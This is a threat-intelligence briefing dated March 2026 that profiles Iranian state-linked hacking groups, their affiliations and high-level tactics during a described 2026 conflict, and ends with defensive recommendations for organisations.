analyst @ nohacky :~/briefings $
cat / briefings / iranian-apt-landscape-2026.html
analyst@nohacky:~/briefings/iranian-apt-landscape-2026.html
reading mode 14 min read
category threat
published March 2026
read_time 14 min

Iranian APT Landscape 2026: Groups, Affiliations, and the Current Threat Picture

Iran's cyber program has never been a single coordinated machine — it's a distributed ecosystem of state-directed APT groups, intelligence agency proxies, hacktivist fronts, and criminal actors operating under varying degrees of state oversight. In early 2026, that ecosystem entered its most operationally active period in years, reshaped by both internal political instability and the most significant kinetic military escalation in the region's modern history.

Understanding the Iranian APT landscape requires understanding its institutional structure. Two primary intelligence organs drive the majority of documented state-directed cyber operations: the Islamic Revolutionary Guard Corps (IRGC), Iran's ideologically oriented paramilitary force, and the Ministry of Intelligence and Security (MOIS), which handles domestic surveillance and foreign intelligence operations. Each sponsors and directs its own cluster of APT groups, with different operational remits, targeting priorities, and technical profiles. Below these sit a third tier — hacktivist fronts, criminal actors, and proxy groups — that carry out plausibly deniable operations aligned with state interests.

warning

On February 28, 2026, the United States and Israel launched coordinated military operations against Iran (designated Operation Epic Fury and Operation Roaring Lion respectively), triggering an immediate and ongoing multi-vector cyber retaliation campaign. Iran's national internet connectivity dropped to between 1% and 4% following the strikes, temporarily constraining state cyber operations — but Iranian APT cells operating outside the country and groups with pre-positioned access continued to conduct operations with tactical autonomy. As of this writing, the conflict and its associated cyber campaign remain active. This analysis reflects the threat picture as understood in late March 2026.

The Institutional Structure

The IRGC sponsors groups primarily oriented toward offensive capability, destructive operations, and regional power projection. Major IRGC-affiliated clusters include APT33, APT35, APT42, Fox Kitten (also known as Pioneer Kitten or Lemon Sandstorm), CyberAv3ngers, Cotton Sandstorm (Emennet Pasargad), and Void Manticore. These groups demonstrate a higher tolerance for destructive operations and more aggressive targeting of critical infrastructure, consistent with the IRGC's broader mandate.

MOIS sponsors groups oriented more toward intelligence collection, credential theft, and persistent access — though the line between espionage and disruption blurs in crisis periods. Major MOIS-affiliated clusters include OilRig (APT34), MuddyWater (Seedworm, Static Kitten), and various sub-components. MOIS's operational remit includes both foreign operations and domestic surveillance of dissidents abroad, and several recent campaigns have combined both objectives.

At the proxy and hacktivist tier, groups like Handala Hack, APT Iran, and a constellation of smaller collectives carry out operations that serve Iranian state interests while maintaining a degree of deniability. These groups typically conduct DDoS attacks, website defacements, data exfiltration, and hack-and-leak operations, and often overstate the impact of their claimed operations. The hacktivist tier surged dramatically following the February 28, 2026 strikes: security researchers tracked over 60 active pro-Iranian threat groups, generating more than 600 distinct cyberattack claims across Telegram channels within the first two weeks of conflict.

OilRig / APT34 (MOIS)

OilRig, also tracked as APT34, Helix Kitten, Hazel Sandstorm, Earth Simnavaz, and EUROPIUM, is one of Iran's longest-running and most technically sophisticated espionage operations. Active since at least 2014 under MOIS direction, the group targets energy, finance, government, chemical, and telecommunications sectors with a geographic focus on the Middle East, the United States, Europe, India, and Iraq. OilRig's operational philosophy is intelligence-first: long-term access development, credential harvesting, and network familiarity that can support either sustained collection or rapid disruptive escalation when directed.

OilRig's tooling is modular and continuously evolving. The group is known for custom backdoors including Helminth, QUADAGENT, and the Exchange-targeting implants STEALHOOK and PowerExchange — the latter using Exchange servers as both a credential store and an exfiltration channel, a technique that blends into legitimate mail traffic and resists conventional detection. DNS tunneling for command-and-control is a persistent signature, enabling C2 communications that survive many network filtering controls. OilRig also demonstrates consistent supply chain awareness: the group has targeted managed service providers and IT vendors to leverage the trust relationships between organizations and their suppliers as access vectors to downstream targets.

Infrastructure analysis published in late 2024 and early 2025 revealed a pre-operational staging effort in which OilRig registered domains impersonating an Iraqi academic institution and fabricated UK technology companies, with consistent SSH key reuse across hosted servers and systematic domain registration designed to support future credential harvesting campaigns. This kind of patient, long-horizon infrastructure development — months before any malware deployment — underscores OilRig's disciplined operational posture. In 2025, confirmed targeting extended to U.S. manufacturing and transportation organizations, and the group maintains assessed long-term access to financial and aviation networks in the U.S. and Gulf states.

MuddyWater / Seedworm (MOIS)

MuddyWater — tracked under aliases including Seedworm, Static Kitten, Mango Sandstorm, TA450, and TEMP.Zagros — is arguably the most operationally active Iranian APT group in the current period. A formal subordinate element within MOIS, the group has been conducting cyber espionage operations since at least 2017, targeting telecommunications, government, defense, oil and gas, and financial sectors across the Middle East, Europe, and North America.

MuddyWater's tradecraft is distinctive for its consistent reliance on PowerShell across every stage of the attack chain, combined with aggressive abuse of legitimate Remote Monitoring and Management (RMM) tools — cycling between platforms like ScreenConnect, AnyDesk, and SimpleHelp — to maintain post-compromise access in ways that blend with normal IT operations. The group delivers initial access through spear-phishing using both custom campaigns and compromised email accounts, and exploits known vulnerabilities in VPN appliances and public-facing applications for network-level entry.

The group's custom C2 framework has evolved through multiple generations: POWERSTATS was followed by MuddyC3, then PhonyC2, MuddyC2Go, and DarkBeatC2. The January 2026 campaign designated Operation Olalampo introduced further novel tooling: a Rust-based backdoor called CHAR using a Telegram bot as C2, and evidence — including the Deno JavaScript runtime in the Dindoor backdoor — that the group is actively diversifying its malware development across Python, C#, Go, Rust, and JavaScript to complicate detection. Researchers identified indicators suggesting AI-assisted malware development in the Operation Olalampo samples, consistent with the broader Iranian adoption of AI tooling documented in 2025 and 2026.

critical

MuddyWater's activity on U.S. bank, airport, nonprofit, and defense-sector software company networks — deploying the previously undocumented Dindoor backdoor — began in early February 2026, weeks before the February 28 strikes. This is pre-positioning, not reaction: the group established persistent footholds in high-value U.S. targets ahead of a triggering geopolitical event. Organizations in financial services, aviation, and defense-adjacent sectors should treat MuddyWater-linked indicators with urgency and assume that pre-positioned access may currently exist in their environments.

MuddyWater has demonstrated a willingness to act as an initial access broker, with documented instances of the group establishing network footholds and then handing operations to other Iranian APT clusters — including Lyceum, a subgroup of OilRig — for deeper exploitation. This inter-group handoff reflects a coordinated division of labor within the Iranian cyber ecosystem rather than isolated, independent operations.

APT42 / Charming Kitten (IRGC)

APT42 — also tracked as Charming Kitten, Mint Sandstorm, and with significant overlap with APT35 — operates on behalf of the IRGC's counterintelligence division, specifically a unit designated IRGC-IO Unit 1500. The group's tradecraft is centered on social engineering and credential harvesting rather than heavy technical exploitation. APT42 cultivates sustained personal relationships with high-value targets — journalists, academics, policy figures, NGO staff, dissidents, and activists — over weeks or months before attempting account compromise or device access.

The group's toolkit has matured significantly into 2026. A backdoor family documented in late 2025 and early 2026 leverages legitimate cloud platforms — Cloudflare Workers, Firebase, OneDrive, and various hosting services — to blend malicious traffic with normal web activity. Execution uses native Windows utilities including PowerShell, Rundll32, and the Windows Command Shell, with persistence via registry run keys. Capabilities include keylogging, screen capture, browser credential and session cookie theft, email collection, and comprehensive system reconnaissance, enabling deep surveillance before any exfiltration. MFA token interception through credential harvesting kits that intercept authentication codes in real time is a documented APT42 capability, enabling account takeover despite MFA enrollment.

A significant leak of internal APT42 operational records was posted to GitHub in September and October 2025 by an anonymous collective called KittenBusters. The leaked materials exposed structured spreadsheets tracking domain registrations, European VPS hosting, and cryptocurrency payments, and confirmed direct infrastructure and administrative overlap with the Moses Staff operation — formally connecting what had sometimes been treated as separate personas into a single coordinated state-directed effort. The records identified Abbas Rahrovi (also known as Abbas Hosseini) as the operation's leader and alleged management through a network of front companies.

In January 2026, a campaign attributed to APT42 (operating under the designation RedKitten in this campaign) targeted Iranian protesters, human rights NGOs, and activists, using weaponized Excel files disguised as lists of casualties from the December 2025 Dey 1404 protests — a period of significant civil unrest and government crackdown in Iran. Malware delivered through these lures used GitHub, Google Drive, and Telegram bots for command-and-control, consistent with APT42's pattern of abusing trusted cloud infrastructure.

APT33 / Elfin (IRGC)

APT33, also tracked as Elfin, Peach Sandstorm, and Refined Kitten, serves as the IRGC's primary destructive arm. Active since at least 2013, the group focuses on aerospace, defense, satellite, oil and gas, energy, and petrochemical sectors, with primary geographic focus on the United States, Saudi Arabia, UAE, South Korea, and Western Europe. APT33 has demonstrated the strongest destructive mandate within the Iranian APT ecosystem and was responsible for the deployment of the Shamoon disk-wiping malware in 2017 and 2018 campaigns against Saudi Arabian energy infrastructure.

Since 2023, APT33's primary initial access method has shifted toward password spraying against Microsoft 365 and Entra ID at scale, using go-http-client through TOR exit nodes. This approach is notable for its patience and scale — targeting organizations across entire sectors with credential stuffing and brute force rather than bespoke phishing, and accepting lower per-target success rates in exchange for volume. Post-compromise activity includes Kerberoasting and AS-REP Roasting for credential escalation. In the current conflict period, APT33 is deploying the Tickler and SHAPESHIFT wiper malware families against aerospace and petrochemical targets in the U.S. and Saudi Arabia, with reported intent to paralyze production infrastructure.

Fox Kitten / Pioneer Kitten (IRGC)

Fox Kitten — tracked under aliases including Pioneer Kitten, Lemon Sandstorm, and Parisite — has operated since approximately 2017 as a specialized initial access broker and VPN exploitation unit within the IRGC ecosystem. The group's defining characteristic is aggressive exploitation of VPN appliances and network perimeter devices: Fortinet, Citrix, Pulse Secure, F5, and Palo Alto Networks devices with known vulnerabilities are targeted at scale for network entry, and the group maintains a portfolio of compromised infrastructure that it uses for both its own operations and for access sales to other Iranian APT groups and, in documented cases, ransomware affiliates.

Fox Kitten has collaborated with ransomware operations — including ALPHV and NoEscape — selling access to compromised networks for profit, reflecting the blurring of state-directed espionage and criminal monetization that characterizes Iran's broader approach to cyber operations. The group also targets managed service providers and IT contractors for their one-to-many access value, enabling downstream compromise of multiple client organizations through a single initial foothold. VPN and remote access appliances remain the single highest-priority device category across Iranian APT operations, and Fox Kitten represents the most focused and technically mature capability in this area.

CyberAv3ngers and Cotton Sandstorm (IRGC)

CyberAv3ngers is an IRGC-affiliated group that has sustained a focused campaign against operational technology (OT) and industrial control systems (ICS), particularly targeting water utilities, fuel management systems, and energy infrastructure in the United States and Israel. The group developed and deployed the IOControl malware family against OT devices — including controllers used in water treatment facilities and fuel management systems — triggering a CISA advisory and a U.S. Department of State Rewards for Justice offer of up to $10 million for attribution information. The group's willingness to target civilian water and fuel infrastructure reflects a threshold for physical-world disruption that many other Iranian groups have historically avoided.

Cotton Sandstorm, also known as Emennet Pasargad and Haywire Kitten, is a MOIS-linked actor that specializes in cyber-enabled influence operations — blending reconnaissance and intrusion with information operations designed to shape perception, amplify social discord, and intimidate perceived opponents of the Iranian regime. The group has targeted media organizations, social media platforms, and individuals in Israel, the United States, France, and Sweden. Its operations increasingly integrate genuine data theft with fabricated or manipulated content, complicating attribution and response.

Handala and the Hacktivist Tier

Handala Hack occupies a unique position in the Iranian cyber ecosystem: formally assessed as linked to MOIS rather than an independent hacktivist group, but operating with the public-facing posture of a hacktivist persona. The group blends data exfiltration with psychological operations and physical threat escalation, targeting Israeli political, defense, and healthcare organizations and, increasingly, Iranian diaspora activists and journalists in Western countries.

Handala's activity in the period leading to and following February 2026 has been particularly aggressive. In December 2025 the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff — though analysis suggested the breach may have been limited to Telegram accounts rather than full device access. In February 2026, the group claimed a breach of one of Israel's largest healthcare networks. In March 2026, Handala orchestrated a destructive attack against U.S. medical device company Stryker using Microsoft Intune as a delivery mechanism for a wiper — a notable escalation in both geographic targeting and destructive capability. The group has also issued direct death threats to Iranian-American and Iranian-Canadian influencers, claiming to have shared their home addresses with physical operatives.

note

Periods of reduced public blog activity from Handala historically correlate with active operational tempo rather than dormancy. The group has shown markedly reduced public output since January 2026 — a pattern that, based on precedent, suggests ongoing campaign execution rather than inactivity. Organizations in Israeli, U.S., and diaspora-adjacent sectors should not interpret Handala's reduced public presence as reduced operational risk.

The broader hacktivist tier — including groups like APT Iran, Siege Goat, and dozens of smaller collectives — primarily contributes DDoS campaigns, defacements, and claimed data leaks of variable credibility. A significant portion of hacktivist claims significantly overstate actual impact, and many claimed breaches consist of recycled or fabricated data rather than genuine exfiltration. The operational significance of this tier lies less in individual impacts and more in the aggregate burden it imposes on defenders and the information environment it creates around genuine state-directed operations.

Cross-Cutting TTPs and Shared Infrastructure Patterns

Despite operating under different institutional sponsors with different mandates, Iranian APT groups share a recognizable set of tactics that reflect common training, tooling libraries, and operational culture. Understanding these cross-cutting patterns is more useful for defenders than tracking individual groups, because many campaigns involve infrastructure and tooling shared across clusters.

VPN and remote access appliances are the single highest-priority initial access vector across the entire Iranian APT ecosystem. Fortinet, Citrix, Ivanti, F5, and Palo Alto Networks devices with known vulnerabilities — particularly those on the CISA Known Exploited Vulnerabilities list — are exploited rapidly and consistently. Organizations with unpatched perimeter devices face significantly elevated risk regardless of which specific Iranian group is targeting them. CISA KEV patch compliance is the single highest-leverage defensive action for organizations within the Iranian targeting envelope.

PowerShell is the execution engine of choice across the ecosystem, appearing in MuddyWater, OilRig, APT33, and APT42 campaigns. Living-off-the-land binary abuse — using native Windows utilities including mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe — is standard practice. This approach limits the footprint of distinctive malware on disk and makes behavioral detection rather than signature detection necessary.

Legitimate cloud platforms — Cloudflare Workers, Firebase, OneDrive, GitHub, Google Drive, Telegram — are consistently abused for C2 communications across multiple groups, exploiting the difficulty of blocking traffic to widely used services. Telegram in particular has become a preferred C2 channel, appearing in MuddyWater's Operation Olalampo (CHAR backdoor), APT42's RedKitten campaign, and numerous hacktivist coordination channels.

Password spraying against cloud identity platforms (Microsoft 365, Entra ID, Okta) using automation routed through TOR exit nodes is documented across APT33 and other groups. The technique is patient and low-noise — it generates failed authentication events but at volumes that blend with legitimate login noise unless specific detection thresholds are configured. Disabling legacy authentication protocols and enforcing phishing-resistant MFA on all externally-facing identity services directly degrades this attack vector.

Supply chain and MSP targeting runs through multiple groups as a force multiplier. Fox Kitten and OilRig both demonstrate consistent interest in IT service providers and managed service companies — organizations whose trusted access to multiple downstream clients makes a single compromise disproportionately valuable. Organizations that are not direct targets of Iranian APT groups may nonetheless be targeted as vectors into organizations that are.

The 2026 Geopolitical Context and Its Implications

The February 28, 2026 strikes and the ongoing conflict have accelerated and intensified Iranian cyber activity in ways that directly affect organizations with no direct connection to the Middle East conflict. Several dimensions of this shift are worth highlighting for defenders.

First, the pre-positioning dimension: MuddyWater's activity on U.S. financial, aviation, and defense networks beginning in early February 2026 — before the kinetic strikes — confirms that Iranian APT groups maintain persistent access to high-value targets as a strategic reserve. This access can be activated for collection or disruption when directed. Organizations that have not recently hunted for Iranian APT indicators in their environments cannot assume clean bills of health from the absence of active incident signals.

Second, the targeting expansion: Researchers have documented that organizations with no direct connection to Israel, the United States, or the conflict are being targeted opportunistically. Financial services firms with Middle Eastern operations or correspondent relationships, aerospace and defense supply chain participants, healthcare organizations, cloud infrastructure providers, and telecommunications companies face elevated risk across a significantly broadened geographic scope — including the E.U., Canada, Australia, and the Gulf states regardless of those countries' direct involvement in the conflict.

Third, the sanctions dimension: Organizations that pay ransoms or otherwise transfer value to Iranian-affiliated groups may face sanctions exposure under U.S. law (IEEPA, TWEA) and equivalent legislation in other jurisdictions. The intersection of criminal ransomware operations and state-directed cyber activity means that the ransomware group receiving payment may be a sanctioned entity, making the payment itself a potential legal liability for the victim organization regardless of intent.

Defensive Priorities for Organizations in the Targeting Envelope

  1. Patch all CISA KEV vulnerabilities on perimeter devices immediately. VPN and remote access appliances — particularly Fortinet, Citrix, Ivanti, F5, and Palo Alto Networks products — are the primary initial access vector across the Iranian APT ecosystem. Unpatched perimeter devices are effectively open invitations. KEV compliance is the baseline, not a stretch goal.
  2. Disable legacy authentication protocols and enforce phishing-resistant MFA on all externally-facing services. Password spraying via TOR against Microsoft 365 and Entra ID is an active, ongoing threat. Disabling basic authentication, enforcing Conditional Access policies requiring managed and compliant devices, and deploying FIDO2/WebAuthn for privileged access all directly reduce exposure to this vector.
  3. Hunt for MuddyWater and OilRig indicators proactively. Given documented pre-positioning in U.S. financial, aviation, and defense networks, threat hunting for known Iranian APT indicators should be an immediate priority — not a response to an active incident. Key hunting targets include the Dindoor and CHAR backdoor families, unusual DLL sideloading activity, Rclone usage for data exfiltration to cloud storage, and unexpected RMM tool installations.
  4. Monitor for cloud platform C2 abuse. Iranian APT groups consistently abuse Cloudflare Workers, Firebase, OneDrive, GitHub, Google Drive, and Telegram for command-and-control. Traffic to these services should not be automatically trusted. User and entity behavior analytics (UEBA) can identify anomalous patterns of access to cloud services from corporate endpoints that may indicate C2 activity.
  5. Audit IT service provider and MSP access. Fox Kitten and OilRig actively target IT vendors and MSPs as supply chain vectors. Organizations should audit what access their IT service providers have to their environments, ensure that provider access is governed by the same MFA and access control standards applied internally, and review network segmentation between provider-managed systems and sensitive internal resources.
  6. Ensure backup infrastructure is isolated and protected against wiper deployment. APT33, Handala, and Cotton Sandstorm have all demonstrated destructive wiper capability. Backups should be stored on infrastructure that is not accessible from the same credential set as production systems, ideally with offline or immutable copies that cannot be encrypted or wiped through a compromised domain account. Recovery time objectives should be tested against realistic wiper scenarios, not just ransomware scenarios.
  7. Treat internal communications as potentially compromised in active incidents. Both MuddyWater and Scattered Spider (operating against Iranian-adjacent targets) have demonstrated surveillance of incident response communications. Sensitive incident response activities should be conducted through out-of-band channels — personal phones, offline secure messaging apps, external email accounts — not through corporate systems that may already be monitored.

Key Takeaways

  1. The Iranian APT ecosystem is not monolithic. Two primary institutional sponsors — the IRGC and MOIS — direct distinct clusters of groups with different mandates, targeting priorities, and technical profiles. Understanding which group is operating in a given incident can indicate whether the objective is espionage, disruption, influence operations, or some combination, which shapes both the immediate response and longer-term risk assessment.
  2. Pre-positioning is documented and ongoing. MuddyWater's establishment of persistent footholds in U.S. financial, aviation, and defense networks weeks before the February 2026 strikes confirms that Iranian APT groups maintain strategic access reserves. Organizations cannot assume absence of compromise from absence of visible activity.
  3. VPN appliances are the primary initial access vector across the entire ecosystem. Patch compliance against CISA KEV vulnerabilities on perimeter devices is the single highest-leverage defensive action available to organizations in the Iranian targeting envelope, regardless of sector or geography.
  4. The hacktivist tier amplifies volume but not necessarily impact. The surge to 60+ active pro-Iranian groups generates significant noise and imposes defender burden, but the majority of hacktivist claims overstate actual impact. Distinguishing hacktivist activity from state-directed APT operations is important for calibrating response priorities.
  5. The targeting envelope is now significantly broader than direct conflict participants. Organizations in Europe, Canada, Australia, and the Gulf with financial, supply chain, or infrastructure exposure to the Middle East face elevated risk regardless of their governments' direct involvement in the conflict. The decision to target an organization is increasingly driven by symbolic value, sector, and opportunism rather than strict geopolitical alignment.
  6. The conflict's cyber dimension will outlast its kinetic phase. Iranian APT groups do not stand down when missiles stop flying — they retool and maintain access. Organizations compromised during a period of heightened activity may carry dormant Iranian footholds into subsequent periods. Post-conflict threat hunting should be as thorough as in-conflict response.

Iran's cyber program has demonstrated consistent investment, adaptability, and patience across two decades of documented operations. The current period — marked by the most significant geopolitical escalation the program has operated through — is neither the beginning nor the end of that trajectory. The groups profiled here will continue to operate, evolve their tooling, and pursue their institutional mandates regardless of how the immediate conflict resolves. The organizations best positioned to withstand that sustained pressure are those that treat Iranian APT risk as a persistent structural condition rather than a crisis-period anomaly.

— end of briefing